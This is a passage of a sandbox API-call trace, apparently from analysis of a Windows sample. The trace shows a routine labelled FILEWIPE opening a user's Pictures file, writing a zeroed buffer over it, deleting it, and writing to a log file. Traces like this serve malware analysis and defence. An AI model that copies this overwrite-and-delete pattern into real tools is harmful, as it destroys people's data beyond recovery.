wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0041.375] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.375] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0041.375] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.375] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0041.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0041.375] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.375] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.375] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0041.376] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.376] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.376] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.376] FreeLibrary (hLibModule=0x754b0000) returned 1 [0041.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0041.376] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0041.376] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.376] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.376] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.376] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.377] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.378] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0041.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0041.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.378] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.378] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.378] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd411ac50, ftCreationTime.dwHighDateTime=0x1d5c012, ftLastAccessTime.dwLowDateTime=0x7e49c540, ftLastAccessTime.dwHighDateTime=0x1d5bd43, ftLastWriteTime.dwLowDateTime=0x7e49c540, ftLastWriteTime.dwHighDateTime=0x1d5bd43, nFileSizeHigh=0x0, nFileSizeLow=0x13ec2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="phhv1rvP we R.gif", cAlternateFileName="PHHV1R~1.GIF")) returned 0x7c2100 [0041.378] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0041.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.378] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.378] CharLowerBuffW (in: lpsz="byte[81602]", cchLength=0xb | out: lpsz="byte[81602]") returned 0xb [0041.379] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.379] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0041.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.379] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.379] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0041.379] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0041.379] FreeLibrary (hLibModule=0x76b40000) returned 1 [0041.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0041.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0041.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.380] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.380] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.380] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.380] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0041.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.381] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0041.381] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.382] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\phhv1rvp we r.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0041.382] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.382] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.382] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.382] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.383] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0041.383] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.383] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.383] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.383] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.383] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.383] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.383] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.383] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.383] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0041.383] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.383] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.383] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.384] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.384] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.384] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.384] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.384] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif", lpFilePart=0x0) returned 0x38 [0041.384] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd411ac50, ftCreationTime.dwHighDateTime=0x1d5c012, ftLastAccessTime.dwLowDateTime=0x7e49c540, ftLastAccessTime.dwHighDateTime=0x1d5bd43, ftLastWriteTime.dwLowDateTime=0x18602460, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x13ec2, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="phhv1rvP we R.gif", cAlternateFileName="PHHV1R~1.GIF")) returned 0x7c2100 [0041.384] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\phhv1rvp we r.gif")) returned 1 [0041.386] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd411ac50, ftCreationTime.dwHighDateTime=0x1d5c012, ftLastAccessTime.dwLowDateTime=0x7e49c540, ftLastAccessTime.dwHighDateTime=0x1d5bd43, ftLastWriteTime.dwLowDateTime=0x18602460, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x13ec2, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="phhv1rvP we R.gif", cAlternateFileName="PHHV1R~1.GIF")) returned 0 [0041.386] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.386] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.386] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.387] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.387] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.387] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.387] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.387] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.387] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.387] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.387] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.387] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.388] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.388] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.388] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.388] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0041.388] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.388] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.388] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0041.388] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3129, lpOverlapped=0x0) returned 1 [0041.388] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0041.388] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x3129, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.388] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 